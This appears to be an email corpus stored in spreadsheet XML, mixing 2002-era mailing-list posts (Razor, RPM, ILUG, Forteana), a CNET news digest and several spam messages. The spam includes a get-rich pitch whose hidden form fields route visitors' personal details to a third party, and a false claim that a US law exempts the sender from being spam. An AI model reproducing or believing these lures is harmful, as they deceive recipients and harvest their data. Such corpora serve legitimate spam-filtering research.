 Also if I point to apt to report then I get an authentication error so
 is there something wrong with that box?
 -----Original Message-----
 From: Rose, Bobby 
 Sent: Tuesday, August 06, 2002 6:54 PM
 To: ML-razor-users
 Subject: RE: [Razor-users] What's wrong with the Razor servers now?
 I'm still seeing this.  It reports to honor.cloudmark.com but checks
 against apt.cloudmark.com.  What is the sync delay between these boxes?
 -----Original Message-----
 From: Rose, Bobby 
 Sent: Monday, August 05, 2002 2:05 PM
 To: ML-razor-users
 Subject: [Razor-users] What's wrong with the Razor servers now?
 I noticed a low count of razor'd spam messages. So after digging, if I
 razor-report a message the diags say that it was accepted but if I turn
 around and run a check on the exact same message that was reported, then
 it doesn't find the sig and as such isn't spam.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: central management
</t>
  </si>
  <si>
    <t xml:space="preserve">hello!
 well in my eyes something like a public contrib repository would be nice (where everyone can at least upload spec files) and a something like a "repository directory" with a collection of available repositorys and their content.
 i am personally on a dsl dialup connection with 16kb/s upstream cap and that kinda sucks perhaps i am gonna still create a respository for small windowmaker dockapps in the future :).
 what do you think?
 thanks,
 che
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Internet Service Provider
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello:
 Are you satisfied with your ISP? Do you have 5 email addresses for you and your family? Do you have 5 MB of personal webspace? How truly unlimited is your access time?
 Our internet service provides you with all of that at a low monthly fee of just $14.95. You get 5 email addresses, 5MB of personal webspace and 350 hours of access time per month (virtually unlimited). That is more than most people will use, do the math.
 We have local numbers for many areas.
 For further information please email me at codjig@canada.com and place "Request Information in the subject line. 
 If you do not wish any more mailings please send a blank email to codjig@canada.com.
 Regards,
 Steve Murphy
 7977JrzS7-887RrsR4903rvQG5-779Sctl3539oIeJ0-966Grtz8l49
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Personal Alcohol Detector
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;For your safe drive...and keep your safety with PersonalAlcoholDetector..&lt;/title&gt;
 &lt;meta name="generator" content="Namo WebEditor v4.0"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="white" text="black" link="blue" vlink="purple" alink="red"&gt;
 &lt;p&gt;&lt;font face="Garamond"&gt;For your safe drive...and keep your safety with &lt;/font&gt;&lt;font face="Garamond" color="red"&gt;Personal Alcohol Detector&lt;/font&gt;&lt;font face="Garamond"&gt;..&lt;br&gt;&lt;img src="http://www.hyundaitrade.com/1_ex/a.jpg" width="80" height="101" border="0"&gt;&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
                   &lt;P align="left"&gt;&lt;font face="Garamond"&gt;The key technology for the function and performance of &lt;br&gt;
                   &lt;/font&gt;&lt;font face="Garamond" color="red"&gt;Personal Alcohol Detector&lt;/font&gt;&lt;font face="Garamond"&gt; is the gas sensor. &amp;nbsp;&lt;br&gt;We  use Advanced MEMS Gas Sensor 
 with high accuracy.&lt;br&gt;&lt;br&gt;We are lookng 
 for &lt;/font&gt;&lt;font face="Garamond" color="red"&gt;resellers, distributors to represent&lt;/font&gt;&lt;font face="Garamond"&gt; this product. &lt;br&gt;If you are interested in dealing 
 please feel free to contact us.&lt;br&gt;&lt;br&gt;Sincerely Yours,&lt;/font&gt;&lt;/P&gt;&lt;P&gt;&lt;font face="Garamond" size="3"&gt;http://www.hyundaitrade.com&lt;BR&gt;&lt;br&gt;&lt;/font&gt;&lt;FONT size="2" face="Garamond"&gt;This message is in full compliance with U.S. 
 Federal requirements for commercial email under bill S.1618 Title lll, Section 
 301, Paragraph (a)(2)(C) passed by the 105th U.S. Congress and cannot be 
 considered SPAM since it includes a remove mechanism.&amp;nbsp; If you are not interested 
 in receiving our e-mails then please reply with a &amp;quot;remove &amp;quot; in the subject line&lt;/FONT&gt;&lt;FONT size="3" face="Garamond"&gt;.&lt;/FONT&gt;&lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] When is a wav not a wav?
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sure that The Beatles are weel happy with Microserfs for robbing them
 blind of their "intellectual Property"
 I'm gonna mail complaints@microsoft.com and get them to put an end to these
 windows cd's ;--)
 Don't suppose you have a reference for it? I've made a lot of friends in the
 MS complaints department, its amazing what you can say to them and get away
 with it --::)))
 CW
 And no sorry I don't know the solution, they must be pretty bad quality
 though if you can fit 25 albums on one CD. I would say they are Mpeg encoded
 or some buzz like that. 
 ---------------------
 I've got some really interesting wav files here.
 A friend had a Windows CD with, wait for it . . .
 Every Beatles Record ever released in the U.K.! Including the Christmas and 
 BBC special albums! All on one, ordinary CD! Yes a 650M CD!
 Of course this CD also had a special Windows app for playing this
 collection!
 I had a look at the contents of the CD, since I don't do Windows, and the 
 albums appeared to be plain wav files? Each album in it's own wav file, 25 
 Albums, 25 wav files?!? I copied the wav files to my hard drive. 
 Curious thing, though, noatun crashes on some of the larger ones, seems to 
 attempt to load the entire file into memory first, and on the ones it
 doesn't 
 crash on, it plays them fast and noisily? kwave refuses to recognise them 
 completely and wavp just makes an ungodly noise!
 xanim can, and does play them correctly though. Unfortunately xanim does not
 have any position control so you just have to listen to the album from start
 to finish.
 file has this to say about them:
 johngay@debian:/home/jgay$ file beatles/SGT.WAV
 beatles/SGT.WAV: RIFF (little-endian) data, WAVE audio, Microsoft ADPCM, 
 stereo 22050 Hz
 johngay@debian:/home/jgay$ ls -l beatles/SGT.WAV
 -r-xr-xr-x    1 johngay  johngay  53334900 Sep 27  2001 beatles/SGT.WAV
 And this is SGT Pepper's lonely Hearts Club Band album. 51M is quite good, 
 considering it also has the inner track. But they certainly are NOT in
 stereo.
 What I would like to do is split up the tracks and convert them the mp3 for 
 xmms. I'm jsut not sure what tools would be able to handle these strange 
 compressed wav's that only xanim seems to recognise? I like the albums, but 
 would prefer to be able to sellect tracks to play rather than entire albums 
 and be able to listen to all my music with one app. I know xmms has a WAV 
 plugin, but it does not recognise these either.
 Any help will be greatly appreciated!
 Cheers,
 	John Gay
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Got Cash?                                                   [mparu]
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY BGCOLOR="WHITE" TEXT="BLACK"&gt;
 &lt;TABLE WIDTH=600&gt;&lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=4 FACE="VERDANA"&gt;
 There are more financial opportunities out there than ever
 before. The majority of those that succeed don't follow the
 rules, they bend them, avoid them or go around them.&lt;BR&gt;&lt;BR&gt;
 Freedom 55 is for the suckers. You don't have to work 40 to
 60 hours a week for 40 years all to make someone else wealthy.
 We have a better way!&lt;BR&gt;&lt;BR&gt;
 &lt;UL&gt;
 &lt;LI&gt;Are You Interested In creating immediate wealth?&lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;Have you considered improving the Quality of your Life?&lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;Do you currently have the home, the car and the life style that you dream of?
 &lt;/UL&gt;&lt;BR&gt;
 Our business develops 6 Figure Income Earners, quickly and
 easily. Let us show you how you can go from just getting by
 to earning over $100,000 in your first year of business.&lt;BR&gt;&lt;BR&gt;
 For more information about this incredible life changing
 opportunity, please complete the form below. The information
 is FREE, confidential and you are under no risk or obligations.&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;FORM Name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post"&gt;
 &lt;INPUT type="hidden" name="fromemail" value="biz@b.com"&gt;
 &lt;INPUT type="hidden" name="from" value="biz@b.com"&gt;
 &lt;INPUT type=hidden name="recipient" value="billjennings70@yahoo.co.uk"&gt;
 &lt;CENTER&gt;&lt;TABLE&gt;&lt;TR&gt;&lt;TD WIDTH=50% VALIGN="TOP"&gt;
 &lt;TABLE CELLSPACING=2&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Name&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{name}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Address&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{address}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="35"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;City&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{city}}"&gt;&lt;INPUT Name="body" Size="21" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;State&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{state}}"&gt;
 &lt;SELECT Name="body"&gt;
 &lt;OPTION VALUE=""&gt;&lt;/OPTION&gt;
 &lt;OPTION VALUE="AL"&gt; Alabama
 &lt;OPTION VALUE="AK"&gt; Alaska
 &lt;OPTION VALUE="AZ"&gt; Arizona
 &lt;OPTION VALUE="AR"&gt; Arkansas
 &lt;OPTION VALUE="CA"&gt; California
 &lt;OPTION VALUE="CO"&gt; Colorado
 &lt;OPTION VALUE="CT"&gt; Connecticut
 &lt;OPTION VALUE="DE"&gt; Delaware
 &lt;OPTION VALUE="DC"&gt; Dist of Columbia
 &lt;OPTION VALUE="FL"&gt; Florida
 &lt;OPTION VALUE="GA"&gt; Georgia
 &lt;OPTION VALUE="HI"&gt; Hawaii
 &lt;OPTION VALUE="ID"&gt; Idaho
 &lt;OPTION VALUE="IL"&gt; Illinois
 &lt;OPTION VALUE="IN"&gt; Indiana
 &lt;OPTION VALUE="IA"&gt; Iowa
 &lt;OPTION VALUE="KS"&gt; Kansas
 &lt;OPTION VALUE="KY"&gt; Kentucky
 &lt;OPTION VALUE="LA"&gt; Louisiana
 &lt;OPTION VALUE="ME"&gt; Maine
 &lt;OPTION VALUE="MD"&gt; Maryland
 &lt;OPTION VALUE="MA"&gt; Massachusetts
 &lt;OPTION VALUE="MI"&gt; Michigan
 &lt;OPTION VALUE="MN"&gt; Minnesota
 &lt;OPTION VALUE="MS"&gt; Mississippi
 &lt;OPTION VALUE="MO"&gt; Missouri
 &lt;OPTION VALUE="MT"&gt; Montana
 &lt;OPTION VALUE="NE"&gt; Nebraska
 &lt;OPTION VALUE="NV"&gt; Nevada
 &lt;OPTION VALUE="NH"&gt; New Hampshire
 &lt;OPTION VALUE="NJ"&gt; New Jersey
 &lt;OPTION VALUE="NM"&gt; New Mexico
 &lt;OPTION VALUE="NY"&gt; New York
 &lt;OPTION VALUE="NC"&gt; North Carolina
 &lt;OPTION VALUE="ND"&gt; North Dakota
 &lt;OPTION VALUE="OH"&gt; Ohio
 &lt;OPTION VALUE="OK"&gt; Oklahoma
 &lt;OPTION VALUE="OR"&gt; Oregon
 &lt;OPTION VALUE="PA"&gt; Pennsylvania
 &lt;OPTION VALUE="RI"&gt; Rhode Island
 &lt;OPTION VALUE="SC"&gt; South Carolina
 &lt;OPTION VALUE="SD"&gt; South Dakota
 &lt;OPTION VALUE="TN"&gt; Tennessee
 &lt;OPTION VALUE="TX"&gt; Texas &lt;OPTION VALUE="UT"&gt; Utah
 &lt;OPTION VALUE="VT"&gt; Vermont
 &lt;OPTION VALUE="VA"&gt; Virginia
 &lt;OPTION VALUE="WA"&gt; Washington
 &lt;OPTION VALUE="WV"&gt; West Virginia
 &lt;OPTION VALUE="WI"&gt; Wisconsin
 &lt;OPTION VALUE="WY"&gt; Wyoming
 &lt;/SELECT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;&lt;TD WIDTH=50% VALIGN="TOP"&gt;
 &lt;TABLE CELLSPACING=2&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Zip Code&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{zipcode}}"&gt;&lt;INPUT Name="body" Size="21" Maxlength="20"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Home Phone&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{phone}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="20"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Time to Contact&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{besttime}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;INPUT type="hidden" name="to" value="161105430"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;E-Mail&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{email}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD ALIGN="CENTER" COLSPAN=2&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Desired Monthly Income&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;INPUT Type="hidden" Name="body" Value="{{desiredincome}}"&gt;
 &lt;SELECT Name="body"&gt;
 &lt;OPTION VALUE=""&gt;&lt;/OPTION&gt;
 &lt;OPTION VALUE="$500"&gt;$500
 &lt;OPTION VALUE="$1000"&gt;$1000
 &lt;OPTION VALUE="$2500"&gt;$2500
 &lt;OPTION VALUE="$5000+"&gt;$5000+
 &lt;/SELECT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD ALIGN="CENTER" COLSPAN=2&gt;&lt;BR&gt;&lt;INPUT Type="submit" Value="  Submit  "&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;&lt;/CENTER&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/FORM&gt;
 ----------&lt;BR&gt;
 To receive no further offers from our company regarding
 this subject or any other, please reply to this
 e-mail with the word 'Remove' in the subject line.&lt;BR&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 vag7pu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Not a materialisation, but a transfiguration
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002 MICGRANGER@aol.com wrote:
 &gt; Concerning this mail, what is your intention?
 When posting to this list excerpts from books I've just read, I usually
 refrain from adding any comments, letting the listmembers interpret them
 as they see fit.
 But since you asked....
 I chose to post this text simply because I thought it was a particularly
 risible example of Doyle's invincible faith and his refusal to accept the
 fucking obvious.
 bc
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: WorldCom woes lead to bankruptcy
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;WorldCom woes lead to bankruptcy&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEkRythwpFWhKPAKa1CPIuR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.6100red2139_160x600.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=7c-7NCZIZWXN33VpXxfLHDx1984BOsR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzVcQE04a9Mzb-Byo4hJdlR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUpLOViRC6OvAKcnvjbgw4R" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZpCwANFFURaT-Dc13yE_rR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWTQjz10LN7c7YuNDxuyCiR"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22, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 WorldCom woes lead to bankruptcy&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Scripting flaw threatens Web servers&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 CollabNet takes wing for online games&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Russian firm points out new Adobe flaw&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 British scientists finish Grid foundation&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Applied's science: Building tinier chips&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Perspectives&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;Do we need a national ID plan?&lt;/b&gt;&lt;br&gt;
 A White House proposal ignites a privacy firestorm.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgysltN5wtIjnbcumX6cvbPR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;WorldCom woes lead to bankruptcy&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Telecommunications giant WorldCom files for bankruptcy, representing the largest such action in U.S. history, though it's hardly alone. The company says it will emerge stronger; customers may get caught holding a dead line.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 22, 2002, 8:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fb-aWErQkg7jbUp--ToFokcTbTDoVrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Scripting flaw threatens Web servers&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A flaw found in newer versions of the PHP Web server scripting language could allow attackers to crash, and in some cases control, computers over the Internet, an open-source developer group announced Monday.
 The vulnerability affects versions 4.2.0 and 4.2.1 of PHP, according to the PHP Group. The flaw compromises different computer architectures in different ways: Web servers running on Intel IA-32 hardware could crash, while other systems, including Sun Microsystems' Solaris, could allow the attacker to infiltrate the computer.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 22, 2002, 11:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9Ns0A42hqKPffACEH5fCAiR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;CollabNet takes wing for online games&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Software development site CollabNet announced Monday that it is working with Butterfly.net, an IBM-backed effort to create a supercomputing grid for hosting online games.
 CollabNet will host the Butterfly Lab, an online environment that will allow developers to test games using a service modeled on the Butterfly approach. Butterfly will also use CollabBet's SourceCast Web application to enable game development teams to share source code, manage art assets and design games for the Butterfly service.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 22, 2002, 11:55 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=25-inepIbdc-mxa9-jZTscR7jeQrFPR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Russian firm points out new Adobe flaw&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Thumbing its nose at the company that landed one of its employees in jail, ElcomSoft is pointing out new flaws in Adobe Systems' eBook software.
 The flaws could allow someone to check out every copy of every book in Adobe's new electronic library for an unlimited amount of time by changing the values in the loan form. However, the bugs were discovered on an Adobe test Web site that demonstrates how the software could be used to set up a lending library--not an actual site that offers books--and ElcomSoft gives information about how to fix the flaws.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 22, 2002, 10:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzkj8jnfi17JR1rqAFZcCnR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;British scientists finish Grid foundation&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 British scientists on Monday announced the completion of one of the building blocks for large-scale data sharing over the Grid--a proposed network of computers seen as the 21st century successor to the Internet.
 The project was carried out by scientists from the U.K.'s E-Science Centres and was co-funded by IBM and Oracle. The companies, rival powers in the database market, contributed both funding and the efforts of their own researchers.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 22, 2002, 10:50 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0cwu0rFlaASOnO8CtmMgRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Applied's science: Building tinier chips&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Applied Materials is harnessing the atom to build better chips.
 The manufacturer of chipmaking equipment said Monday that its latest product will incorporate a technique called atomic layer deposition, which creates chips atom by atom.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 22, 2002, 9:10 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=65-K82zIDP9dzrq7D_D70VOf0m8P9ZR"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&lt;b&gt;Nvidia: Dodging a hail of bullets&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Can the chip wizard fight off rivals and the SEC?
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 29, 2002 issue
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPB8plvVlS8hU6coezkBZXdR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Sohu: So far, so good--sort of&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The Chinese portal should go easy celebrating its first quarterly profit. It still faces a chilling threat from Beijing's thought police.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 22, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KJgfVQqE_Xvsg9tyQFWveR"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href="http://clickthru.online.com/Click?q=a4-HGTsQ6p4mX_2wlK463LvvI2rgYyR"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href="http://clickthru.online.com/Click?q=b9-WWcsQ-B4MXJyUAvh8FdMkmoOwzlR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsHsopJVYy3ufz1Jey2fP4R"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href="http://clickthru.online.com/Click?q=e3-ze2WQkVDQA1aimj-JM2mPpt29erR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfscKXcjAfKpiaRL6DCwoliR"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href="http://clickthru.online.com/Click?q=0d-3aGuIbr1RG1SqjTNv0T0QkY6b7PR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnwsaJO6iAv2Y9ZZvQKrR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM1EShCNJtnhJiSUxuD-DiR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
